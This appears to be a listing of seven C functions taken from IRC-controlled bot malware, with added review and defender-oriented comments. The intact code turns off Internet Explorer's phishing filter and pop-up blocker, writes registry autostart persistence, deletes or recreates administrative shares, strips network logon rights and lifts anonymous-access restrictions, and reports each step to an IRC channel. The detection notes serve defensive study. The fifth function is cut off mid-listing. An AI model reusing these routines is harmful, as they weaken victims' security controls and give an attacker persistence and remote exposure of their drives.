Esempio n. 1
/*
 * Sets the DWORD value "Enabled" to 0 under
 * HKCU\Software\Microsoft\Internet Explorer\PhishingFilter. According to the
 * original author's note ("IE7 Anti Phisher killer") the intent is to switch
 * off the Internet Explorer 7 phishing filter for the current user.
 *
 * Defender's view: the write goes to HKEY_CURRENT_USER, which typically needs
 * no elevation. In registry telemetry, this value being set to 0 by a process
 * that is neither the browser nor a management tool is worth an alert.
 *
 * Returns 1 unconditionally after a fixed 5-second sleep. Neither registry
 * call's result is checked and the opened key is not closed in this function.
 */
int phishfuck()
{
   /* Octal literal; the value written is simply 0. */
   DWORD ff = 00000000;
    HKEY hRegKey;
    /* fRegOpenKeyEx / fRegSetValueEx are not defined in this listing;
       presumably run-time resolved pointers to the advapi32 API -- confirm. */
    fRegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\PhishingFilter", NULL, NULL, &hRegKey);
    fRegSetValueEx(hRegKey,"Enabled",NULL,REG_DWORD,(LPBYTE) &ff,sizeof(DWORD));
    Sleep(5000);
	return 1;
} 
Esempio n. 2
/*
 * Sets the DWORD value "PopupMgr" to 0 under
 * HKCU\Software\Microsoft\Internet Explorer\New Windows. According to the
 * original author's note the intent is to turn off the pop-up blocker in
 * Internet Explorer 6/7 for the current user.
 *
 * Defender's view: like any HKEY_CURRENT_USER write this typically needs no
 * elevation. A browser protection setting flipped to 0 by an unrelated
 * process is a tampering indicator to look for in registry audit data.
 *
 * Returns 1 unconditionally after a fixed 5-second sleep. Neither registry
 * call's result is checked and the opened key is not closed in this function.
 */
int popdown()
{
    /* Octal literal; the value written is simply 0. */
    DWORD z = 00000000;
    HKEY hRegKey;
    /* fRegOpenKeyEx / fRegSetValueEx are not defined in this listing;
       presumably run-time resolved pointers to the advapi32 API -- confirm. */
    fRegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Internet Explorer\\New Windows", NULL, NULL, &hRegKey);
    fRegSetValueEx(hRegKey,"PopupMgr",NULL,REG_DWORD,(LPBYTE) &z,sizeof(DWORD));
    Sleep(5000);
	return 1;
}
Esempio n. 3
/*
 * Adds or removes one named value in every registry key listed in the
 * `autostart` table.
 *
 * nfilename: when non-NULL it is written as a REG_SZ value named `valuename`
 *            in each key; when NULL that value is deleted from each key.
 *
 * `autostart`, AUTOSTART and `valuename` are defined outside this listing.
 * NOTE(review): the names suggest start-at-logon keys, which would make this
 * the install/uninstall routine for registry persistence -- confirm against
 * the table. For detection, the artefact is one value name appearing under
 * several autostart locations at once and pointing at the same file.
 *
 * No registry call's result is checked.
 */
void AutoStartRegs(char *nfilename)
{
	HKEY key;

	/* One pass per table entry: root key + subkey path come from the table. */
	for (int i=0; i < (sizeof(autostart) / sizeof(AUTOSTART)); i++) {
		/* Creates the key if it does not exist yet and requests KEY_ALL_ACCESS. */
		fRegCreateKeyEx(autostart[i].hkey, autostart[i].subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
		if (nfilename)
			fRegSetValueEx(key, valuename, 0, REG_SZ, (const unsigned char *)nfilename, strlen(nfilename));
		else
			fRegDeleteValue(key, valuename); 
		fRegCloseKey(key); 
	}
   
	return;
}
Esempio n. 4
// Applies three host changes and reports each result to an IRC channel and to
// the local log:
//   1. sets "EnableDCOM" to "N" under HKLM\<regkey3>,
//   2. sets "restrictanonymous" to 1 under HKLM\<regkey4>,
//   3. enumerates the network shares and deletes every share whose name ends
//      in '$'; if enumeration fails it deletes the entries of ShareList instead.
//
// sock, chan, notice: passed through to irc_privmsg() for the status lines.
// silent:             when TRUE nothing is sent to IRC; addlog() still runs.
// Returns TRUE unconditionally, whatever the individual steps did.
//
// regkey3, regkey4, ShareList, ShareDel, AsAnsiString, irc_privmsg, addlog and
// the noadvapi32 / nonetapi32 flags are defined outside this listing.
//
// Defender's view: these are hardening-style settings, but the status lines
// go to an IRC channel rather than to an administrator.
// NOTE(review): that pattern looks like a command handler of an IRC-controlled
// agent -- confirm from the caller. Administrative ('$') shares disappearing
// together with these two HKLM writes, made by a process that is not a
// management tool, is a useful correlation for detection.
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	// Registry steps only run when advapi32 was loaded (flag set elsewhere).
	if (!noadvapi32) {
		HKEY hKey;
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="N";
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Disable DCOM failed.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: DCOM disabled.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Failed to restrict access to the IPC$ Share.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: Restricted access to the IPC$ Share.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ Restriction registry key.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
	// Sends whichever message the branch above left in sendbuf.
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	if (!nonetapi32) {
		PSHARE_INFO_502 pBuf,p;
		NET_API_STATUS nStatus;
		DWORD entriesread=0,totalread=0,resume=0;

		// Repeats while the API reports ERROR_MORE_DATA; `resume` carries the
		// enumeration position between calls.
		do {
			nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

			if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
				p = pBuf;

				for(unsigned int i=1;i <= entriesread;i++) {
					// Only shares whose last character is '$' are touched.
					// NOTE(review): an empty share name makes wcslen()-1 wrap
					// and index outside the string.
					if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {
						// NOTE(review): _snprintf writes no terminator when the
						// text fills sendbuf; the share name is system-supplied.
						if(ShareDel(NULL,AsAnsiString(p->shi502_netname)) == NERR_Success)
							_snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »»  Share '%S' deleted.",p->shi502_netname);
						else
							_snprintf(sendbuf,sizeof(sendbuf),"nzm (secure.plg) »»  Failed to delete '%S' share.",p->shi502_netname);
						if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
						addlog(sendbuf);
					}

					p++;
				}

				fNetApiBufferFree(pBuf);
			} else {
				// Enumeration failed: fall back to the static ShareList table.
				// NOTE(review): '%S' is used here although ShareList[i].ShareName
				// is passed to ShareDel() in the same position as the
				// AsAnsiString() result above; if it is a narrow string the
				// specifier does not match -- confirm the field type.
				for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) {
					if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%S' deleted.4>>",ShareList[i].ShareName);
					else
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to delete '%S' share.4>>",ShareList[i].ShareName);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				}
			}
		} while (nStatus == ERROR_MORE_DATA);
		// Summary line is set regardless of whether the deletions succeeded.
		sprintf(sendbuf,"4<<12[SECURE]: Network shares deleted.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Netapi32.dll couldn't be loaded.4>>");
	// Four arguments here, five everywhere else; presumably the last parameter
	// of irc_privmsg has a default -- confirm against its declaration.
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
	addlog(sendbuf);

	return TRUE;
}
Esempio n. 5
// Reverses the settings applied by the SecureSystem routine and reports each
// result to an IRC channel and to the local log:
//   1. sets "EnableDCOM" to "Y" under HKLM\<regkey3>,
//   2. sets "restrictanonymous" to 0 under HKLM\<regkey4>,
//   3. re-creates the shares in ShareList (all but its last two entries) and
//      adds a "<letter>$" share for every fixed drive except A.
//
// sock, chan, notice: passed through to irc_privmsg() for the status lines.
// silent:             when TRUE nothing is sent to IRC; addlog() still runs.
//
// The listing is truncated after the final `else`, so the tail of the
// function (including its return) is not visible here. regkey3, regkey4,
// ShareList, ShareAdd, irc_privmsg and addlog are defined elsewhere.
//
// Defender's view: every step widens remote exposure. "restrictanonymous"
// going from 1 to 0 and drive-letter '$' shares being created by a process
// that is not a management tool are both worth alerting on.
BOOL UnSecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	// Registry steps only run when advapi32 was loaded (flag set elsewhere).
	if (!noadvapi32) {
		HKEY hKey;
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="Y";
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Enable DCOM failed.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: DCOM enabled.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open DCOM registry key.4>>");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000000;
			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"4<<12[SECURE]: Failed to unrestrict access to the IPC$ Share.4>>");
			else
				sprintf(sendbuf,"4<<12[SECURE]: Unrestricted access to the IPC$ Share.4>>");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"4<<12[SECURE]: Failed to open IPC$ restriction registry key.4>>");
	} else
		sprintf(sendbuf,"4<<12[SECURE]: Advapi32.dll couldn't be loaded.4>>");
	// Sends whichever message the branch above left in sendbuf.
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	if (!nonetapi32) {
		// The loop bound skips the last two ShareList entries; the reason is
		// not visible in this listing.
		for(int i=0;i < ((sizeof(ShareList) / sizeof (NetShares)) - 2);i++) {
			if(ShareAdd(NULL,ShareList[i].ShareName,ShareList[i].SharePath) == NERR_Success)
				_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%s' added.4>>",ShareList[i].ShareName);
			else
				_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to add '%s' share.4>>",ShareList[i].ShareName);
			if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
			addlog(sendbuf);
		}

		char sharename[10], sharepath[10];
		// Bit n of the mask corresponds to drive letter 'A'+n; the mask is
		// shifted right once per letter until no bits remain.
		DWORD dwDrives = GetLogicalDrives();
		for(char cDrive='A'; dwDrives!=0; cDrive++, dwDrives=(dwDrives>>1)) {
			if((dwDrives & 1)==1 && cDrive != 'A') {
				_snprintf(sharename,sizeof(sharename),"%c$",cDrive);
				_snprintf(sharepath,sizeof(sharepath),"%c:\\",cDrive);

				// Only fixed drives get a share.
				if (fGetDriveType(sharepath) == DRIVE_FIXED) {
					if(ShareAdd(NULL,sharename,sharepath) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Share '%s' added.4>>",sharename);
					else
						_snprintf(sendbuf,sizeof(sendbuf),"4<<12[SECURE]: Failed to add '%s' share.4>>",sharename);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				}
			}
		}

		// Summary line is set regardless of whether the additions succeeded.
		sprintf(sendbuf,"4<<12[SECURE]: Network shares added.4>>");
	} else
Esempio n. 6
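// Create (or open) SubKey under hKey and, when KeyName is given, write one
// value of the requested Type into it.
//
//   hKey     root key or already-open parent key
//   SubKey   path of the key to create/open (opened with KEY_WRITE)
//   KeyName  value name; 0 means "only make sure the key exists"
//   Type     REG_SZ, REG_EXPAND_SZ, REG_DWORD or REG_MULTI_SZ; others fail
//   Data     Data.szQuery for the string types, Data.dwQuery for REG_DWORD
//            (RQUERY is declared outside this block)
//
// For REG_MULTI_SZ the entries in Data.szQuery are separated by '\n'.
//
// Returns TRUE on success. Returns FALSE when the key cannot be opened, the
// type is unsupported, the string is NULL or does not fit the staging buffer,
// or the registry write fails. The key handle is closed on every path.
//
// The string is length-checked before it is copied: the earlier unbounded
// strcpy() overran the stack buffer for any input longer than the buffer.
BOOL RegWrite(HKEY hKey,LPCTSTR SubKey,LPCTSTR KeyName,DWORD Type,RQUERY Data)
{
	HKEY	hRegKey;
	DWORD	dwBuf;
	char	szRegBuffer[65535+2]; // Only allow writing of 64Kb to a key, include space for double null
	size_t	i, nLen, cbData;
	BOOL	bOk = FALSE;

	// Open the registry key
	if (fRegCreateKeyEx(hKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_WRITE,NULL,&hRegKey,NULL) != ERROR_SUCCESS)
	{
		return FALSE;
	}

	// If no keyname then we are finished
	if (KeyName == 0)
	{
		fRegCloseKey(hRegKey);
		return TRUE;
	}

	// Write the registry differently depending on type of variable we are writing
	switch (Type)
	{

	case REG_EXPAND_SZ:
	case REG_SZ:
		if (Data.szQuery == NULL)
			break;

		// Reject anything that would not fit together with its terminator
		nLen = strlen(Data.szQuery);
		if (nLen + 1 > sizeof(szRegBuffer))
			break;

		memcpy(szRegBuffer, Data.szQuery, nLen + 1);
		bOk = (fRegSetValueEx(hRegKey,KeyName,0,Type,(CONST BYTE *)szRegBuffer,(DWORD)(nLen+1)) == ERROR_SUCCESS);
		break;

	case REG_DWORD:
		dwBuf = Data.dwQuery;
		bOk = (fRegSetValueEx(hRegKey,KeyName,0,REG_DWORD,(CONST BYTE *)&dwBuf,sizeof(dwBuf)) == ERROR_SUCCESS);
		break;

	case REG_MULTI_SZ:
		if (Data.szQuery == NULL)
			break;

		// Needs room for the text plus the double null
		nLen = strlen(Data.szQuery);
		if (nLen + 2 > sizeof(szRegBuffer))
			break;

		memcpy(szRegBuffer, Data.szQuery, nLen);
		szRegBuffer[nLen] = '\0';			// Double null
		szRegBuffer[nLen+1] = '\0';

		// Change all \n to \0 so each line becomes one entry
		for (i = 0; i < nLen; ++i)
			if (szRegBuffer[i] == '\n')
				szRegBuffer[i] = '\0';

		// If blank then must use a size of 0, ignoring \0\0 (blank values not allowed)
		// Otherwise take our stringlen + 2 (double null) as the size
		cbData = (nLen != 0) ? nLen + 2 : 0;

		bOk = (fRegSetValueEx(hRegKey,KeyName,0,REG_MULTI_SZ,(CONST BYTE *)szRegBuffer,(DWORD)cbData) == ERROR_SUCCESS);
		break;

	default:
		// Unsupported type: fall through to the common close with bOk == FALSE
		break;

	}

	fRegCloseKey(hRegKey);
	return bOk;

}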
Esempio n. 7
// Applies a series of host changes and reports each result to an IRC channel
// and to the local log:
//   1. sets "EnableDCOM" to "N" under HKLM\<regkey3>,
//   2. sets "restrictanonymous" to 1 under HKLM\<regkey4>,
//   3. sets "restrictanonymoussam" to 1 under HKLM\<regkey4>,
//   4. unless NO_LSARESTRICT is defined, calls SearchForPrivilegedAccounts()
//      for "SeNetworkLogonRight" and reports the returned count,
//   5. unless NO_NET is defined, enumerates the network shares and deletes
//      every share whose name ends in '$'; if enumeration fails it deletes
//      the entries of ShareList instead.
//
// sock, chan, notice: passed through to irc_privmsg() for the status lines.
// silent:             when TRUE nothing is sent to IRC; addlog() still runs.
// Returns TRUE unconditionally, whatever the individual steps did.
//
// regkey3, regkey4, ShareList, ShareDel, SearchForPrivilegedAccounts,
// irc_privmsg, addlog and the noadvapi32 / nonetapi32 flags are defined
// outside this listing.
//
// Defender's view: these are hardening-style settings, but the status lines
// go to an IRC channel rather than to an administrator.
// NOTE(review): that pattern looks like a command handler of an IRC-controlled
// agent -- confirm from the caller. Administrative ('$') shares disappearing,
// network logon rights being stripped from accounts and these HKLM writes
// occurring together are a useful correlation for detection.
BOOL SecureSystem(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	// Registry and policy steps only run when advapi32 was loaded.
	if (!noadvapi32) {
		HKEY hKey; 
		if(fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey3, 0, KEY_READ|KEY_WRITE, &hKey) == ERROR_SUCCESS) {
			TCHAR szDataBuf[]="N"; 
			if(fRegSetValueEx(hKey, "EnableDCOM", NULL, REG_SZ, (LPBYTE)szDataBuf, strlen(szDataBuf)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Disable DCOM failed.");
			else
				sprintf(sendbuf,"[SECURE]: DCOM disabled.");
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open DCOM registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymous", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Failed to restrict access to the IPC$ Share.");
			else
				sprintf(sendbuf,"[SECURE]: Restricted access to the IPC$ Share.");			
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open IPC$ Restriction registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		// Same key as the previous step, second value.
		if (fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey4, 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS) {
			DWORD dwData = 0x00000001;
			if (fRegSetValueEx(hKey, "restrictanonymoussam", 0, REG_DWORD, (LPBYTE) &dwData, sizeof(DWORD)) != ERROR_SUCCESS)
				sprintf(sendbuf,"[SECURE]: Failed to restrict anonymous enumeration of SAM accounts.");
			else
				sprintf(sendbuf,"[SECURE]: Restricted anonymous enumeration of SAM accounts.");			
			fRegCloseKey(hKey);
		} else
			sprintf(sendbuf,"[SECURE]: Failed to open enumeration of SAM accounts registry key.");
		if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
		addlog(sendbuf);

		// The helper's return value is treated as the number of accounts
		// changed; its implementation is not part of this listing.
		#ifndef NO_LSARESTRICT
		DWORD dwRet;
		if ((dwRet = SearchForPrivilegedAccounts(L"SeNetworkLogonRight", FALSE)) > 0)
			sprintf(sendbuf,"[SECURE]: Removed SeNetworkLogonRights from %d accounts in local system policy.", dwRet);
		else
			sprintf(sendbuf,"[SECURE]: Failed to remove SeNetworkLogonRights from any accounts in local system policy.");
		#endif
	} else
		sprintf(sendbuf,"[SECURE]: Advapi32.dll couldn't be loaded.");
	// Sends whichever message the branch above left in sendbuf; with
	// NO_LSARESTRICT defined that is the SAM message a second time.
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice, TRUE);
	addlog(sendbuf);

	#ifndef NO_NET
	if (!nonetapi32) {
		PSHARE_INFO_502 pBuf,p;
		NET_API_STATUS nStatus;
		DWORD entriesread=0,totalread=0,resume=0;
 
		// Repeats while the API reports ERROR_MORE_DATA; `resume` carries the
		// enumeration position between calls.
		do {
			nStatus = fNetShareEnum(NULL, 502, (LPBYTE *) &pBuf, -1, &entriesread, &totalread, &resume);

			if(nStatus == ERROR_SUCCESS || nStatus == ERROR_MORE_DATA) {
				p = pBuf;
 
				for(unsigned int i=1;i <= entriesread;i++) {
					// Only shares whose last character is '$' are touched.
					// NOTE(review): an empty share name makes wcslen()-1 wrap
					// and index outside the string.
					if (p->shi502_netname[wcslen(p->shi502_netname)-1] == '$') {	
						// NOTE(review): memory-safety defects in the next two lines:
						//  - sizeof(szShareName) is the size of a pointer, not of
						//    the allocation, so the conversion is capped at
						//    pointer-size bytes and fails for longer names;
						//  - the result is not checked, so szShareName may reach
						//    ShareDel() without a terminator;
						//  - the buffer is sized in wide characters, which can be
						//    too small for a multi-byte ANSI code page.
						char* szShareName = new char[wcslen(p->shi502_netname)+1];
						WideCharToMultiByte(CP_ACP, WC_NO_BEST_FIT_CHARS, p->shi502_netname, -1, szShareName, sizeof(szShareName), NULL, NULL);

						// NOTE(review): _snprintf writes no terminator when the
						// text fills sendbuf; the share name is system-supplied.
						if(ShareDel(NULL,szShareName) == NERR_Success)
							_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%S' deleted.",p->shi502_netname);
						else 
							_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%S' share.",p->shi502_netname);
						if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
						addlog(sendbuf);

						// NOTE(review): allocated with new[] but released with
						// scalar delete -- undefined behaviour; needs delete[].
						delete szShareName;
					}

					p++;
				}

				fNetApiBufferFree(pBuf);
			} else {
				// Enumeration failed: fall back to the static ShareList table.
				for(int i=0;i < (sizeof(ShareList) / sizeof (NetShares));i++) { 
					if(ShareDel(NULL,ShareList[i].ShareName) == NERR_Success)
						_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Share '%s' deleted.",ShareList[i].ShareName);
					else 
						_snprintf(sendbuf,sizeof(sendbuf),"[SECURE]: Failed to delete '%s' share.",ShareList[i].ShareName);
					if (!silent) irc_privmsg(sock,chan,sendbuf,notice, TRUE);
					addlog(sendbuf);
				} 
			}
		} while (nStatus == ERROR_MORE_DATA);	
		// Summary line is set regardless of whether the deletions succeeded.
		sprintf(sendbuf,"[SECURE]: Network shares deleted.");
	} else
		sprintf(sendbuf,"[SECURE]: Netapi32.dll couldn't be loaded.");
	// Four arguments here, five everywhere else; presumably the last parameter
	// of irc_privmsg has a default -- confirm against its declaration.
	if (!silent) irc_privmsg(sock,chan, sendbuf, notice);
	addlog(sendbuf);
	#endif

	return TRUE;
}